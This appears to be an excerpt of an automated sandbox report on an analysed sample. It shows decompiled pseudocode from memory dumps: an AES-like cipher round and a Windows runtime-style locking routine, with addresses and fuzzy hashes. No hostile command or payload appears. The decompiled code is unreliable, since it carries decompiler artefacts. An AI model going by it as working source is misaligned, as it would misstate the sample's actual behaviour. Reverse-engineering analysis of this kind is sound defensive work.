				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}

0x00402fb0
0x00402fbf
0x00402fc8
0x00402fd6
0x00402fda
0x00402fe3
0x00402ff4
0x00402ff7
0x00402ffc
0x00403005
0x00403013
0x00403018
0x00403021
0x00403031
0x00403051
0x00403054
0x00403066
0x0040306b
0x00403080
0x0040309d
0x004030a0
0x004030b1
0x004030c6
0x004030e6
0x004030e9
0x004030fb
0x00403119
0x00403136
0x00403139
0x0040314b
0x00403160
0x00403166
0x0040316e
0x0040316f
0x00403172
0x00403180
0x00403190
0x004031a2
0x004031b4
0x004031d0
0x004031e3
0x004031f0
0x00403201
0x00403218
0x0040323a
0x0040323d
0x0040324e
0x00403269
0x00403280
0x00403283
0x00403295
0x0040329d
0x004032b2
0x004032cf
0x004032d2
0x004032e3
0x00403307
0x00403317
0x0040331a
0x0040332c
0x00403344
0x00403347
0x0040335a
0x00403367
0x00403379
0x00403391
0x004033b4
0x004033b7
0x004033c9
0x004033de
0x004033e4
0x004033e4
0x004033e7
0x004033e7
0x00403180
0x0040344b
0x00403454
0x00403462
0x004034c0
0x004034c9
0x004034d7
0x00403539
0x00403542
0x0040354f
0x00403552
0x0040359e
0x004035aa
0x004035b3
0x004035c0
0x004035c7

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 01A120A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01A120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1ad8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01A12EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01A12EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E019E58EC(_t240);
									_t221 =  *0x1ad5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1ad5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01A24A2C(0x1ad6e40, 0x1a24b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01A07D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x19c5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E01A1F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E01A1F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01A67016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01A02400(_t267 + 0x20);
															}
															L01A02400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01A12397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01A02280(_t134, 0x1ad8608);
									__eflags =  *0x1ad6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E019FFFB0(_t198, _t241, 0x1ad8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1ad6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1ad8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01A16B90(_t210,  &_v64);
										_t262 =  *0x1ad8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E01A1E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E01A297C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E01A2006A(0x1ad8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1ad8608);
												E01A2B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1ad6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1ad6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E019FFFB0(_t198, _t240, 0x1ad8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E01A200C2(0x1ad8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x01a120a0
0x01a120a8
0x01a120ad
0x01a120b3
0x01a120b8
0x01a120c2
0x01a120c7
0x01a120cb
0x01a120d2
0x01a12263
0x01a12266
0x01a55836
0x01a55836
0x00000000
0x01a1226c
0x01a1226c
0x01a12270
0x01a12274
0x01a120e2
0x01a120e2
0x01a120e6
0x01a120ee
0x01a557dc
0x01a557de
0x01a557ec
0x01a557ec
0x01a557f1
0x01a557f3
0x01a557f8
0x00000000
0x01a557f8
0x01a557e0
0x01a557e4
0x01a557ea
0x00000000
0x00000000
0x00000000
0x01a557ea
0x01a120f4
0x01a120f4
0x01a120f8
0x01a120f8
0x01a120fc
0x01a12100
0x01a12106
0x01a12201
0x01a12206
0x01a1220b
0x01a1220e
0x01a122a9
0x01a122ac
0x00000000
0x00000000
0x01a122b2
0x01a122b5
0x01a55801
0x01a55806
0x00000000
0x00000000
0x01a55810
0x01a55815
0x01a55818
0x00000000
0x00000000
0x01a5581e
0x01a122bb
0x01a122bb
0x01a12218
0x01a12218
0x01a1221c
0x01a12220
0x01a12222
0x01a122c2
0x01a122c4
0x01a122dc
0x01a122dc
0x01a122e1
0x00000000
0x00000000
0x00000000
0x01a122e7
0x01a122c8
0x01a122cd
0x01a122d3
0x01a122d6
0x01a55823
0x01a55825
0x01a55827
0x00000000
0x00000000
0x01a5582d
0x00000000
0x01a5582d
0x00000000
0x01a12228
0x01a12228
0x00000000
0x01a12228
0x01a12222
0x01a12214
0x01a12214
0x00000000
0x01a12114
0x01a12114
0x01a12114
0x01a1211a
0x01a1211c
0x01a12348
0x01a1234d
0x01a55840
0x01a55845
0x01a55848
0x01a5584e
0x01a5584e
0x01a55848
0x01a12353
0x01a12355
0x01a12388
0x01a12388
0x01a12368
0x01a1236a
0x01a1236c
0x01a1238f
0x00000000
0x01a1236e
0x01a1236e
0x01a1218e
0x01a1218e
0x01a12191
0x01a12195
0x01a55a03
0x01a55a06
0x01a55a0c
0x01a55a0f
0x01a55a11
0x01a55a13
0x01a55a13
0x01a55a19
0x01a55a1f
0x00000000
0x01a1219b
0x01a1219b
0x01a121a0
0x01a12282
0x01a12284
0x01a12284
0x01a12284
0x01a12284
0x01a121a6
0x01a121a9
0x01a121ac
0x01a121ae
0x01a121b3
0x01a1228b
0x01a12290
0x01a12379
0x01a12296
0x01a12298
0x01a12298
0x01a12290
0x01a121b9
0x01a121be
0x01a122a2
0x01a122a2
0x01a121c4
0x01a121c8
0x01a121cc
0x01a121d0
0x01a121d4
0x01a121de
0x01a121e3
0x01a55a29
0x01a55a2c
0x00000000
0x00000000
0x01a55a3b
0x00000000
0x01a121e9
0x01a121e9
0x01a121e9
0x01a121ee
0x01a121f1
0x01a55a45
0x01a55a4b
0x01a55a52
0x01a55a58
0x01a55a5d
0x01a55a5f
0x01a55a71
0x01a55a61
0x01a55a6a
0x01a55a6a
0x01a55a76
0x01a55a79
0x01a55a7f
0x01a55a83
0x01a55a85
0x01a55a87
0x01a55a87
0x01a55a8c
0x01a55a91
0x01a55a97
0x01a55a9f
0x01a55aa0
0x01a55aa1
0x01a55aa6
0x01a55aab
0x01a55ab1
0x01a55ab3
0x01a55ab9
0x01a55aca
0x01a55ad4
0x01a55ad4
0x01a55ade
0x01a55ade
0x01a55aab
0x01a55a79
0x01a55a52
0x01a121f7
0x01a121f9
0x01a121fe
0x01a121fe
0x01a121e3
0x01a12195
0x01a1236c
0x01a12122
0x01a12122
0x01a12124
0x01a12231
0x01a12236
0x01a12236
0x01a12238
0x01a12238
0x01a12240
0x01a12242
0x01a12244
0x01a559fc
0x01a1218c
0x01a1218c
0x00000000
0x01a1218c
0x01a1224a
0x01a1224f
0x01a12256
0x01a12304
0x01a12309
0x01a1230f
0x01a1231e
0x01a1231e
0x01a1231e
0x01a12320
0x01a12325
0x01a1232a
0x01a1232c
0x01a1233e
0x01a1233e
0x00000000
0x01a1232c
0x01a12311
0x01a12317
0x01a1231a
0x01a1231c
0x01a12380
0x01a12380
0x01a12380
0x01a12384
0x00000000
0x00000000
0x01a12386
0x00000000
0x01a1231c
0x01a1225c
0x01a1225c
0x00000000
0x01a1225c
0x01a1212a
0x01a12134
0x01a12138
0x01a1213d
0x01a55858
0x01a55863
0x01a55863
0x01a55867
0x01a5586a
0x00000000
0x00000000
0x01a5586c
0x01a5586c
0x01a55871
0x01a55875
0x01a55877
0x01a55997
0x01a5599c
0x01a559a1
0x01a559a7
0x01a559a7
0x00000000
0x01a559a7
0x01a5587d
0x00000000
0x01a5588b
0x01a5588b
0x01a55890
0x01a55892
0x01a55894
0x01a55899
0x01a5589b
0x01a558a0
0x01a558a0
0x01a558aa
0x01a558b2
0x01a558b6
0x01a558be
0x01a558c6
0x01a558c9
0x01a5590d
0x01a55917
0x01a5591a
0x01a5591c
0x01a55920
0x01a55928
0x01a5592a
0x01a5592c
0x01a5592e
0x01a5592e
0x01a558cb
0x01a558cd
0x01a558d8
0x01a558e0
0x01a558f4
0x01a558fe
0x01a558fe
0x01a5593a
0x01a5593e
0x01a55940
0x01a55942
0x00000000
0x01a55944
0x01a55944
0x01a55949
0x01a5594e
0x01a5594e
0x01a55953
0x01a5595b
0x01a55976
0x01a55976
0x01a5597a
0x01a5597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01a55981
0x01a55981
0x01a55981
0x01a55983
0x01a55988
0x01a5598d
0x01a55991
0x01a55991
0x00000000
0x01a5595d
0x01a5595d
0x01a55963
0x01a55965
0x00000000
0x00000000
0x00000000
0x00000000
0x01a55967
0x01a55967
0x01a5596b
0x01a5596d
0x00000000
0x00000000
0x01a5596f
0x01a55971
0x01a55971
0x01a55974
0x00000000
0x00000000
0x00000000
0x01a55974
0x00000000
0x01a55967
0x01a5595b
0x01a55942
0x01a55863
0x01a12143
0x01a12143
0x01a12149
0x01a1214f
0x01a122f1
0x01a122f6
0x00000000
0x01a12173
0x01a12173
0x01a1217d
0x01a12181
0x01a12186
0x01a559ae
0x01a559b2
0x01a559b5
0x01a559b7
0x01a559ba
0x01a559cd
0x01a559d1
0x01a559d5
0x01a559d9
0x01a559db
0x00000000
0x00000000
0x01a559dd
0x01a559dd
0x01a559e1
0x01a559e4
0x01a559e7
0x01a559ee
0x01a559ee
0x01a559f3
0x01a559f3
0x00000000
0x01a12186
0x01a1214f
0x01a12106
0x01a12266
0x01a120d8
0x01a120da
0x01a120e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa9e9f7dc2e1535ea5ff4ff0c22468291428ef4654782042af1a07acd1c5c6e
Instruction ID: 9c06d497df0cc86adfc386442bc1130d48b7b3096f164d42bd20450d883343c8
Opcode Fuzzy Hash: baa9e9f7dc2e1535ea5ff4ff0c22468291428ef4654782042af1a07acd1c5c6e
Instruction Fuzzy Hash: 8DF1F575A08341DFE726CF2CC94076A7BF1AF85324F28851EE999DB285D734D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019FB090, Relevance: .4, Instructions: 405
COMMONCrypto

